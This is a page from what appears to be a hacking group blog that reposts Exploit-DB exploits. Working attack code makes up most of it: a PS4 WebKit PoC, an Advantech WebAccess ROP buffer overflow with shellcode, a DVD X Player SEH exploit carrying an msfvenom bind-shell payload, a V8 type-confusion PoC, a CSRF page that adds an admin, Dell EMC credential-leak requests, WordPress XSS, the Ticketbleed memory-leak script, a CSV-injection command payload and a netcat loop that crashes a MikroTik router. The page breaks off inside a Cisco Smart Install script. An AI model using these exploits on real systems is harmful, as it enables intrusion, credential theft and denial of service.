CVE 2014-1303 Proof Of Concept for PS4
==============
This repository contains a poc for the CVE 2014-1303 originally disclosed by Liang Chen. It has been tested to work on system firmware 2.03, but should work for systems on a firmware < 2.50, the ROP test will however only work on 2.03.
Usage
==============
You need to edit the dns.conf to point to the ip address of your machine, and modify your consoles dns settings to point to it as well. Then run
`python fakedns.py -c dns.conf`
then
`python server.py`
Debug output will come from this process.
Navigate to the User's Guide page on the PS4 and various information should be printed to the console. The ROP test will print what is stored in the rsp register. Continuing execution after rsp is pivoted still needs to be done.
Acknowledgements
================
Liang Chen
thexyz
dreadlyei
Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44200.zip
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863108763
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#!/usr/bin/python2.7
# Exploit Title: Advantech WebAccess < 8.1 webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow RCE
# Date: 03-29-2018
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.advantech.com
# Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.0/AdvantechWebAccessUSANode8.0_20150816.exe
# Version: Advantech WebAccess 8.0-2015.08.16
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2016-0856
# See Also: https://www.zerodayinitiative.com/advisories/ZDI-16-093/
import sys, struct
from impacket import uuid
from impacket.dcerpc.v5 import transport
def call(dce, opcode, stubdata):
dce.call(opcode, stubdata)
res = -1
try:
res = dce.recv()
except Exception, e:
print "Exception encountered..." + str(e)
sys.exit(1)
return res
if len(sys.argv) != 2:
print "Provide only host arg"
sys.exit(1)
port = 4592
interface = "5d2b62aa-ee0a-4a95-91ae-b064fdb471fc"
version = "1.0"
host = sys.argv[1]
string_binding = "ncacn_ip_tcp:%s" % host
trans = transport.DCERPCTransportFactory(string_binding)
trans.set_dport(port)
dce = trans.get_dce_rpc()
dce.connect()
print "Binding..."
iid = uuid.uuidtup_to_bin((interface, version))
dce.bind(iid)
print "...1"
stubdata = struct.pack("<III", 0x00, 0xc351, 0x04)
call(dce, 2, stubdata)
print "...2"
stubdata = struct.pack("<I", 0x02)
res = call(dce, 4, stubdata)
if res == -1:
print "Something went wrong"
sys.exit(1)
res = struct.unpack("III", res)
if (len(res) < 3):
print "Received unexpected length value"
sys.exit(1)
print "...3"
# MessageBoxA() Shellcode
# Credit: https://www.exploit-db.com/exploits/40245/
shellcode = ("\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x53\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x68\x6c\x6c\x42\x42\x88\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x75\x73\x65\x72\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x6f\x78\x41\x42\x88\x4c\x24\x03\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd6\x83\xc4\x0c\x31\xd2\x31\xc9\x52\x68\x73\x67\x21\x21\x68\x6c\x65\x20\x6d\x68\x53\x61\x6d\x70\x8d\x14\x24\x51\x68\x68\x65\x72\x65\x68\x68\x69\x20\x54\x8d\x0c\x24\x31\xdb\x43\x53\x52\x51\x31\xdb\x53\xff\xd0\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\xd6\x31\xc9\x51\xff\xd0")
def create_rop_chain():
rop_gadgets = [
0x0704ac03, # XOR EAX,EAX # RETN ** [BwPAlarm.dll] eax = 0
0x0706568c, # XOR EDX,EDX # RETN ** [BwPAlarm.dll] edx = 0
0x0702455b, # ADD EAX,40 # RETN ** [BwPAlarm.dll] ** eax = 0x40
0x0702823d, # PUSH EAX # ADD BYTE PTR DS:[ESI],7 # MOV DWORD PTR DS:[7070768],0 # POP ECX # RETN
# ecx = 0x40
]
for i in range(0, 63):
rop_gadgets.append(0x0702455b) # ADD EAX,40 # RETN ** [BwPAlarm.dll] **
# eax = 0x1000
rop_gadgets += [
0x0702143d, # ADD EDX,EAX # ADD AL,0 # AND EAX,0FF # RETN 0x04 ** [BwPAlarm.dll]
# edx = eax
# edx = 0x1000
0x07065b7b, # POP EDI # RETN [BwPAlarm.dll]
0x41414141,
0x07059581, # RETN (ROP NOP) [BwPAlarm.dll]
# edi = RETN
0x0705ddfd, # POP EAX # RETN [BwPAlarm.dll]
0x0201e104, # ptr to &VirtualAlloc() [IAT BwKrlAPI.dll]
0x070630eb, # MOV EAX,DWORD PTR DS:[EAX] # RETN [BwPAlarm.dll]
0x070488f7, # PUSH EAX # MOV EAX,DWORD PTR DS:[EDX*4+7068548] # AND EAX,ESI # POP ESI # POP EBX # RETN
# esi -> PTR to VirtualAlloc
0xFFFFFFFF # ebx = -1
]
for i in range(0, len(shellcode)+1):
rop_gadgets.append(0x0703e116) # INC EBX # MOV AX,10 # RETN ** [BwPAlarm.dll]
# ebx = size of shellcode
rop_gadgets += [
0x070441d1, # POP EBP # RETN [BwPAlarm.dll]
0x0703fe39, # POINTER INC ECX # PUSH ESP # RETN ** [BwPAlarm.dll] **
# ebp -> Return to ESP
0x0705ddfd, # POP EAX # RETN [BwPAlarm.dll] ------ Modified by me
0x90909090, # nop
# eax = 0x90909090
0x07010f5c # PUSHAD # RETN [BwPAlarm.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
# construct buffer
buf = "A"*379
buf += "\x33\xb7\x01\x07" # 0701b733 RETN
buf += create_rop_chain()
buf += shellcode
# ioctl 0x278E
stubdata = struct.pack("<IIII", res[2], 0x278E, len(buf), len(buf))
fmt = "<" + str(len(buf)) + "s"
stubdata += struct.pack(fmt, buf)
print "\nDid it work?"
call(dce, 1, stubdata)
dce.disconnect()
######################################################
# Exploit Title: Buffer Overflow on DVD X Player Standard 5.5.3.9
# Date: 29.03.2018
# Vendor Homepage: http://www.dvd-x-player.com
# Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup-
# Standard.exe
# Category: Local (SEH Based)
# Exploit Credit: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Version: 5.5.3.9
# Tested on: Windows XP SP3 x86
# CVE: CVE-2018-9128
######################################################
# root@PKP:~# msfvenom -p windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 -b "\x00\x0a\x0d\x1a" -f python
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from the payload
# x86/shikata_ga_nai chosen with final size 355
# Payload size: 355 bytes
# Final size of python file: 1710 bytes
file = open("exploit_dvdx_player_standard_5.5.3.9.plf","w")
buffer = "\x41" * 608
next_seh = "\xeb\x06\x90\x90"
seh = "\xBC\x13\x5F\x02" # pop/pop/ret : EchoDelayProcess.dll
nops = "\x90" * 100
buf = ""
buf += "\xda\xd4\xd9\x74\x24\xf4\xb8\xb3\xb9\xc8\xae\x5a\x31"
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x13\x03\xf1\xaa\x2a"
buf += "\x5b\x09\x24\x28\xa4\xf1\xb5\x4d\x2c\x14\x84\x4d\x4a"
buf += "\x5d\xb7\x7d\x18\x33\x34\xf5\x4c\xa7\xcf\x7b\x59\xc8"
buf += "\x78\x31\xbf\xe7\x79\x6a\x83\x66\xfa\x71\xd0\x48\xc3"
buf += "\xb9\x25\x89\x04\xa7\xc4\xdb\xdd\xa3\x7b\xcb\x6a\xf9"
buf += "\x47\x60\x20\xef\xcf\x95\xf1\x0e\xe1\x08\x89\x48\x21"
buf += "\xab\x5e\xe1\x68\xb3\x83\xcc\x23\x48\x77\xba\xb5\x98"
buf += "\x49\x43\x19\xe5\x65\xb6\x63\x22\x41\x29\x16\x5a\xb1"
buf += "\xd4\x21\x99\xcb\x02\xa7\x39\x6b\xc0\x1f\xe5\x8d\x05"
buf += "\xf9\x6e\x81\xe2\x8d\x28\x86\xf5\x42\x43\xb2\x7e\x65"
buf += "\x83\x32\xc4\x42\x07\x1e\x9e\xeb\x1e\xfa\x71\x13\x40"
buf += "\xa5\x2e\xb1\x0b\x48\x3a\xc8\x56\x05\x8f\xe1\x68\xd5"
buf += "\x87\x72\x1b\xe7\x08\x29\xb3\x4b\xc0\xf7\x44\xab\xfb"
buf += "\x40\xda\x52\x04\xb1\xf3\x90\x50\xe1\x6b\x30\xd9\x6a"
buf += "\x6b\xbd\x0c\x06\x63\x18\xff\x35\x8e\xda\xaf\xf9\x20"
buf += "\xb3\xa5\xf5\x1f\xa3\xc5\xdf\x08\x4c\x38\xe0\x32\x5f"
buf += "\xb5\x06\x50\x4f\x90\x91\xcc\xad\xc7\x29\x6b\xcd\x2d"
buf += "\x02\x1b\x86\x27\x95\x24\x17\x62\xb1\xb2\x9c\x61\x05"
buf += "\xa3\xa2\xaf\x2d\xb4\x35\x25\xbc\xf7\xa4\x3a\x95\x6f"
buf += "\x44\xa8\x72\x6f\x03\xd1\x2c\x38\x44\x27\x25\xac\x78"
buf += "\x1e\x9f\xd2\x80\xc6\xd8\x56\x5f\x3b\xe6\x57\x12\x07"
buf += "\xcc\x47\xea\x88\x48\x33\xa2\xde\x06\xed\x04\x89\xe8"
buf += "\x47\xdf\x66\xa3\x0f\xa6\x44\x74\x49\xa7\x80\x02\xb5"
buf += "\x16\x7d\x53\xca\x97\xe9\x53\xb3\xc5\x89\x9c\x6e\x4e"
buf += "\xb7\x6d\xa2\x5b\x20\xd4\x57\x26\x2c\xe7\x82\x65\x49"
buf += "\x64\x26\x16\xae\x74\x43\x13\xea\x32\xb8\x69\x63\xd7"
buf += "\xbe\xde\x84\xf2"
file.write(buffer + next_seh + seh + nops + buf)
file.close()
/*
I think this commit has introduced the bug: https://chromium.googlesource.com/v8/v8.git/+/9884bc5dee488bf206655f07b8a487afef4ded9b
Reduction LoadElimination::ReduceTransitionElementsKind(Node* node) {
...
if (object_maps.contains(ZoneHandleSet<Map>(source_map))) {
object_maps.remove(source_map, zone());
object_maps.insert(target_map, zone());
- AliasStateInfo alias_info(state, object, source_map);
- state = state->KillMaps(alias_info, zone());
- state = state->AddMaps(object, object_maps, zone());
+ state = state->SetMaps(object, object_maps, zone());
}
...
}
I think the "state->KillMaps(alias_info, zone());" was accidentally removed. This lack may lead CheckMap instructions to be removed incorrectly.
A PoC demonstrating type confusion:
*/
function opt(a, b) {
b[0] = 0;
a.length;
// TransitionElementsKind
for (let i = 0; i < 1; i++)
a[0] = 0;
// CheckMap removed, type confusion
b[0] = 9.431092e-317; // 0x1234567
}
let arr1 = new Array(1);
arr1[0] = 'a';
opt(arr1, [0]);
let arr2 = [0.1];
opt(arr2, arr2);
%OptimizeFunctionOnNextCall(opt);
opt(arr2, arr2);
arr2[0].x // access 0x1234566
Without natives syntax:
function opt(a, b) {
b[0] = 0;
a.length;
// TransitionElementsKind
for (let i = 0; i < 1; i++)
a[0] = 0;
b[0] = 9.431092e-317; // 0x1234567
// Force optimization
for (let i = 0; i < 10000000; i++) {
}
}
let arr1 = new Array(1);
arr1[0] = 'a';
opt(arr1, [0]);
let arr2 = [0.1];
opt(arr2, arr2);
opt(arr2, arr2);
arr2[0].x // access 0x1234566
# Exploit Title: WUZHI CMS 4.1.0 CSRF vulnerability add admin account
# Date: 2018-04-10
# Exploit Author: taoge
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
# Software Link: https://github.com/wuzhicms/wuzhicms
# Version: 4.1.0
# CVE : CVE-2018-9926
An issue was discovered in WUZHI CMS 4.1.0.(https://github.com/wuzhicms/wuzhicms/issues/128)
There is a CSRF vulnerability that can add an admin account via index.php?m=core&f=power&v=add.
After the administrator logged in, open the csrf exp page.
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;
fields += "<input type='hidden' name='form[role][]' value='1' />";
fields += "<input type='hidden' name='form[username]' value='hack123' />";
fields += "<input type='hidden' name='form[password]' value='' />";
fields += "<input type='hidden' name='form[truename]' value='taoge@5ecurity' />";
var url = "http://127.0.0.1/www/index.php?m=core&f=power&v=add&&_su=wuzhicms&_menuid=61&_submenuid=62&submit=taoge";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>
# Exploit Title: [Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability (DSA-2018-025)]
# Date: [24/11/2017]
# Exploit Author: [SlidingWindow]
# Vendor Homepage: [https://store.Dell EMC.com/en-us/AVAMAR-PRODUCTS/Dell-DELL EMC-Avamar-Virtual-Edition-Data-Protection-Software/p/DELL EMC-Avamar-Virtual-Edition]
# Version: [Dell EMC Avamar Server 7.3.1 , Dell EMC Avamar Server 7.4.1, Dell EMC Avamar Server 7.5.0, Dell EMC Integrated Data Protection Appliance 2.0, Dell EMC Integrated Data Protection Appliance 2.1]
# Tested on: [Dell EMC Avamar Virtual Edition version 7.5.0.183]
# CVE : [CVE-2018-1217]
==================
#Product:-
==================
EMC Avamar Virtual Edition is great for enterprise backup data protection for small and medium sized offices. EMC Avamar Virtual Edition is optimized for backup and recovery of virtual and physical servers,enterprise applications,remote offices,and desktops or laptops.
==================
#Vulnerability:-
==================
Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability (DSA-2018-025)
========================
#Vulnerability Details:-
========================
=====================================================================================================================================================
1. Missing functional level access control allows an unauthenticated user to add DELL EMC Support Account to the Installation Manager (CVE-2018-1217)
=====================================================================================================================================================
DELL EMC Avamar fails to restrict access to Configuration section that let Administrators set up Installation Manager configurations, or check for new packages from the Online Support site. An unauthenticated, remote attacker could add an Online Support Account for DELL EMC without any user interaction.
#Proof-Of-Concept:
------------------
1. Send following request to the target:
POST /avi/avigui/avigwt HTTP/1.1
Host: <target_ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Permutation: 8EGHBE4312AFBC12325324123DF4545A
X-GWT-Module-Base: https://<target_ip>/avi/avigui/
Referer: https://<target_ip>/avi/avigui.html
Content-Length: 452
Connection: close
7|0|7|https://<target_ip>/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|saveLDLSConfig|java.lang.String/2004016611|<target_ip>|{"proxyHost":null, "proxyPort":0, "useProxyAuthentication":false, "proxyUsername":null, "proxyPassword":null, "disableInternetAccess":false, "proxyEnable":false, "emcsupportUsername":"hacker", "emcsupportPassword":"hacked3", "disableLDLS":false}|1|2|3|4|3|5|5|5|6|0|7|
2. Log into Avamar Installation Manager and navigate to Configuration tab to make sure that the user 'hacker' was added successfully.
=========================================================================================================================================================
2. Missing functional level access control allows an unauthenticated user to retrieve DELL EMC Support Account Credentials in Plain Text (CVE-2018-1217)
=========================================================================================================================================================
DELL EMC Avamar fails to restrict access to Configuration section that let Administrators set up Installation Manager configurations, or check for new packages from the Online Support site. An unauthenticated, remote attacker could retrieve Online Support Account password in plain text.
#Proof-Of-Concept:
------------------
1. Send following request to the target:
POST /avi/avigui/avigwt HTTP/1.1
Host: <target_ip>
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Permutation: 3AF662C052F0EB9D3D51649D2293F6EC
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
DNT: 1
Content-Length: 192
7|0|6|https://<target_ip>/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|getLDLSConfig|java.lang.String/2004016611|<target_ip>|1|2|3|4|2|5|5|6|0|
2. Server returns credentials in plain text:
HTTP/1.1 200 OK
Date: Fri, 17 Nov 2017 10:46:31 GMT
Server: Jetty(9.0.6.v20130930)
Content-Type: application/json; charset=utf-8
Content-Disposition: attachment
Content-Length: 275
Connection: close
//OK[1,["{\"proxyHost\":null,\"proxyPort\":0,\"useProxyAuthentication\":false,\"proxyUsername\":\"\",\"proxyPassword\":\"\",\"disableInternetAccess\":false,\"proxyEnable\":false,\"emcsupportUsername\":\"hacker\",\"emcsupportPassword\":\"hacked3\",\"disableLDLS\":false}"],0,7]
=========================================================================================================================================================
3. Improper validation of ëDELL EMC Customer Support passcodeí allows an authenticated user to unlock DELL EMC Support Account and download verbose logs
=========================================================================================================================================================
DELL EMC Avamar fails to validate ëDELL EMC Customer Support passcodeí properly allowing an authenticated user to unlock the support account and view/download verbose logs. However, according to vendor, this one seems to be a vulnerability but it's an ambuious functionality instead.
#Proof-Of-Concept:
------------------
1. Try to unlock the support account with an invalid password and you get error 'Customer Support Access Denied':
2. Now send the same request again (with invalid password) and tamper the server response:
Request:
---------
POST /avi/avigui/avigwt HTTP/1.1
Host: <target_ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Permutation: 3AF662C052F0EB9D3D51649D2293F6EC
X-GWT-Module-Base: https://<target_ip>/avi/avigui/
Referer: https://<target_ip>/avi/avigui.html
Content-Length: 202
Cookie: supo=x; JSESSIONID=9tt4unkdjjilbo072x4nji2y
Connection: close
7|0|7|https://<target_ip>/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|supportLogin|java.lang.String/2004016611|<target_ip>|1|2|3|4|3|5|5|5|6|0|7|
Tampered response:
--------------------
HTTP/1.1 200 OK
Date: Fri, 24Nov 2017 07:57:25 GMT
Server: Jetty(9.0.6.v20130930)
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Disposition: attachment
Content-Length: 21
Connection: close
//OK[1,["true"],0,7]
3. This unlocks the support account and enabled the 'Log' download button.
===================================
#Vulnerability Disclosure Timeline:
===================================
11/2017: First email to disclose the vulnerability to EMC Security Response Team.
12/2017: Vendor confirmed vulnerability#1 and vulnerability#3, and discarded vulnerability#3 stating that this is an ambigious functionaliy and not a vulnerability.
12/2017: Vendor confirmed that the fix will be released in January 2018.
01/2018: Vendor delayed the fix release stating that the Dell EMC IDPA is also vulnerable.0
04/2018: Vendor assigned CVE-2018-1217 and pubished the advisory 'DSA-2018-025: Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability': http://seclists.org/fulldisclosure/2018/Apr/14
# Exploit Title: WordPress Plugin WordPress File Upload 4.3.3 - Stored XSS
# Date: 06/04/2018
# Exploit Author: ManhNho
# Vendor Homepage: https://www.iptanus.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-file-upload.zip
# Version: 4.3.3
# Tested on: Windows 7 / Cent OS 6.5
# CVE : CVE-2018-9844
# Category : Webapps
Description
===========
WordPress File Upload is a WordPress plugin with more than 20.000 active
installations.
Version 4.3.3 (and possibly previous versions) are affected by a Stored XSS
vulnerability in the admin panel ,related to the "Edit_Setting"
functionality.
PoC
===============
Request:
POST /wp-admin/options-general.php?page=wordpress_file_upload&action=edit_settings
HTTP/1.1
Host: 192.168.1.66
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101
Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.66/wp-admin/options-general.php?page=
wordpress_file_upload&action=plugin_settings
Content-Type: multipart/form-data; boundary=---------------------
------27678165033834
Content-Length: 906
Cookie: wordpress_ce39b1fa1561a0e8d46e02ff9e65f6a0=admin%7C1523124759%
7CYpPsz6ePz7L52pKrUk6uFioJlynhadnrSuv2lKQNhJe%7Ca3c7a75afaaf9ce1db3596b8aa83
3adeb337f313ef5156fbf93096c1af0cdbbc; wp-settings-1=libraryContent%3Dbrowse;
wp-settings-time-1=1522504284; PHPSESSID=o6smfv1u6p8rh7cu7v7gl9lm47;
wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_
ce39b1fa1561a0e8d46e02ff9e65f6a0=admin%7C1523124759%
7CYpPsz6ePz7L52pKrUk6uFioJlynhadnrSuv2lKQNhJe%7C1993c93121805782b8bee82cd013
6f1a6aa286d4294ed58cb6f95539acdfe5d5
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------27678165033834
Content-Disposition: form-data; name="_wpnonce"
c9d5733e36
-----------------------------27678165033834
Content-Disposition: form-data; name="_wp_http_referer"
/wp-admin/options-general.php?page=wordpress_file_upload&
action=plugin_settings
-----------------------------27678165033834
Content-Disposition: form-data; name="action"
edit_settings
-----------------------------27678165033834
Content-Disposition: form-data; name="wfu_basedir"
<script>alert('XSS')</script>
-----------------------------27678165033834
Content-Disposition: form-data; name="wfu_postmethod"
fopen
-----------------------------27678165033834
Content-Disposition: form-data; name="wfu_admindomain"
siteurl
-----------------------------27678165033834
Content-Disposition: form-data; name="submitform"
Update
-----------------------------27678165033834--
Response:
HTTP/1.1 200 OK
Date: Thu, 05 Apr 2018 18:15:01 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28623
...
<input name="wfu_basedir" id="wfu_basedir" type="text"
value="<script>alert('XSS')</script>" />
<p style="cursor: text; font-size:9px; padding: 0px; margin: 0px; width:
95%; color: #AAAAAA;">Current value: <strong><script>alert('XSS')</
script></strong></p>
...
References
===============
https://www.iptanus.com/new-version-4-3-4-of-wordpress-file-upload-plugin/
https://wordpress.org/plugins/wp-file-upload/#developers
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9844
# -*- coding: utf-8 -*-
#!/usr/bin/python
# Exploit Title: Ticketbleed
# Google Dork: n/a
# Date: Exploit: 02/13/17, Advisory Published: 02/09/17
# Exploit Author: @0x00string
# Vendor Homepage: https://f5.com/
# Software Link: https://support.f5.com/csp/article/K05121675
# Version: see software link for versions
# Tested on: F5 BIGIP 11.6
# CVE : CVE-2016-9244
# require: scapy_ssl_tls (https://github.com/tintinweb/scapy-ssl_tls)
import re, getopt, sys, socket
from struct import *
try:
from scapy_ssl_tls.ssl_tls import *
except ImportError:
from scapy.layers.ssl_tls import *
def banner():
print '''
lol ty filippo!
ty tintinweb!
0000000000000
0000000000000000000 00
00000000000000000000000000000
0000000000000000000000000000000
000000000 0000000000
00000000 0000000000
0000000 000000000000
0000000 000000000000000
000000 000000000 000000
0000000 000000000 000000
000000 000000000 000000
000000 000000000 000000
000000 00000000 000000
000000 000000000 000000
0000000 000000000 0000000
000000 000000000 000000
0000000000000000 0000000
0000000000000 0000000
00000000000 00000000
00000000000 000000000
0000000000000000000000000000000
00000000000000000000000000000
000 0000000000000000000
0000000000000
@0x00string
https://github.com/0x00string/oldays/blob/master/CVE-2016-9244.py
'''
def usage ():
print ("python script.py <args>\n"
" -h, --help: Show this message\n"
" -a, --rhost: Target IP address\n"
" -b, --rport: Target port\n"
"\n\n"
"Examples:\n"
"python script.py -a 10.10.10.10 -b 443\n"
"python script.py --rhost 10.10.10.10 --rport 8443")
exit()
def pretty (t, m):
if (t is "+"):
print "\x1b[32;1m[+]\x1b[0m\t" + m + "\n",
elif (t is "-"):
print "\x1b[31;1m[-]\x1b[0m\t" + m + "\n",
elif (t is "*"):
print "\x1b[34;1m[*]\x1b[0m\t" + m + "\n",
elif (t is "!"):
print "\x1b[33;1m[!]\x1b[0m\t" + m + "\n",
def createDump (input):
d, b, h = '', [], []
u = list(input)
for e in u:
h.append(e.encode("hex"))
if e == '0x0':
b.append('0')
elif 30 > ord(e) or ord(e) > 128:
b.append('.')
elif 30 < ord(e) or ord(e) < 128:
b.append(e)
i = 0
while i < len(h):
if (len(h) - i ) >= 16:
d += ' '.join(h[i:i+16])
d += " "
d += ' '.join(b[i:i+16])
d += "\n"
i = i + 16
else:
d += ' '.join(h[i:(len(h) - 0 )])
pad = len(' '.join(h[i:(len(h) - 0 )]))
d += ' ' * (56 - pad)
d += ' '.join(b[i:(len(h) - 0 )])
d += "\n"
i = i + len(h)
return d
def ticketBleed (rhost, rport):
h = (rhost,int(rport));
version = TLSVersion.TLS_1_2
secret = ""
session_ticket = ""
sid = ""
cipher = TLSCipherSuite.ECDHE_RSA_WITH_AES_256_CBC_SHA
with TLSSocket(socket.socket(), client=True) as sock:
sock.connect(h)
ctx = sock.tls_ctx
packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=version, cipher_suites=TLS_CIPHER_SUITES.keys(), extensions=[TLSExtension() / TLSExtSessionTicketTLS(data="")])
sock.sendall(packet)
sock.recvall()
packet_ke = TLSRecord(version=version) / TLSHandshake() / ctx.get_client_kex_data()
packet_ccs = TLSRecord(version=TLSVersion.TLS_1_2) / TLSChangeCipherSpec()
sock.sendall(TLS.from_records([packet_ke, packet_ccs]))
sock.sendall(to_raw(TLSFinished(), ctx))
ret = sock.recvall()
session_ticket = ret[TLSSessionTicket].ticket
secret = ctx.master_secret
#pretty("*", "ctx 1: \n" + str(ctx))
with TLSSocket(socket.socket(), client=True) as sock:
sock.connect(h)
ctx = sock.tls_ctx
packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=TLSVersion.TLS_1_2, cipher_suites=TLS_CIPHER_SUITES.keys(), session_id="A", extensions=[TLSExtension() / TLSExtSessionTicketTLS(data=session_ticket)])
sock.tls_ctx.resume_session(secret)
sock.sendall(packet)
ret = sock.recvall()
sid = ret[TLSServerHello].session_id
#pretty("*", "ctx 2: \n" + str(ctx))
pretty("+", "bled 'A' + 31 bytes: \n" + createDump(sid))
def main():
rhost = None;
rport = None;
options, remainder = getopt.getopt(sys.argv[1:], 'a:b:h:', ['rhost=','rport=','help',])
for opt, arg in options:
if opt in ('-h', '--help'):
usage()
elif opt in ('-a','--rhost'):
rhost = arg;
elif opt in ('-b','--rport'):
rport = arg;
banner()
if rhost is None or rport is None:
usage()
ticketBleed(rhost,rport)
exit(0);
if __name__ == "__main__":
main()
# Exploit Title: Joomla Extension Convert Forms version 2.0.3 is vulnerable to Formula Injection (CSV Injection)
# Google Dork: N/A
# Date: 12-04-2018
################################
# Exploit Author: Jetty Sairam
################################
# Software Link: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/forms/convert-forms/
# Affected Version: 2.03 and before
#Category: Plugins and Extensions
# Tested on: WiN7_x64
# CVE : CVE-2018-10063
1. Application Description:
Convert Forms provides a framework to build custom forms for Joomla users.
2. Technical Description:
Custom Forms version 2.0.3 is affected by the vulnerability Remote Command Execution using CSV Injection. This allows a public user to inject commands as a part of form fields and when a user with higher privilege exports the form data in CSV opens the file on their machine, the command is executed.
3. Proof Of Concept:
Enter the payload @SUM(1+1)*cmd|' /C calc'!A0 in the form fields and submit.
When high privileged user logs into the application to export form data in CSV and opens the file.
Formula gets executed and calculator will get popped in his machine.
4. Solution:
Upgrade to version 2.0.4
https://extensions.joomla.org/extensions/extension/contacts-and-feedback/forms/convert-forms/
5. Reference:
https://vel.joomla.org/resolved/2160-convert-forms-2-0-3-csv-injection
https://www.tassos.gr/blog/convert-forms-2-0-4-security-release
https://vel.joomla.org/articles/2140-introducing-csv-injection
################
#Title: MikroTik 6.41.4 Denial of service FTP daemon crash
#CVE: CVE-2018-10070
#CWE: CWE-400
#Exploit Author: Hosein Askari (FarazPajohan)
#Vendor HomePage: https://mikrotik.com/
#Version : 6.41.4 (Released 2018-Apr-05) | All Version
#Date: 13-05-2018
#Category: Network Appliance
#Description: A vulnerability in MikroTik Version 6.41.4 could allow an unauthenticated remote attacker to exhaust all available CPU and all available RAM by sending crafted FTP requests on port 21 that begins with many '\0' characters, #preventing the affected router from accepting new FTP connections. The router will reboot after 10 minutes, logging a "router was rebooted without proper shutdown" message.
#POC: https://vimeo.com/264461602
################
for i in `seq 1 100`
do
cat craft | nc -nv <MikroTik IP> 21 &
sleep 2
done
# smi_ibc_init_discovery_BoF.py
import socket
import struct
from optparse import OptionParser
# Parse the target options
parser = OptionParser()
parser.add_option("-t", "--target", dest="target", help="Smart Install Client", default="192.168.1.1") parser.add_option("-p", "--port", dest="port", type="int", help="Port of Client", default=4786) (options, args) = parser.parse_args()
def craft_tlv(t, v, t_fmt='!I', l_fmt='!I'):
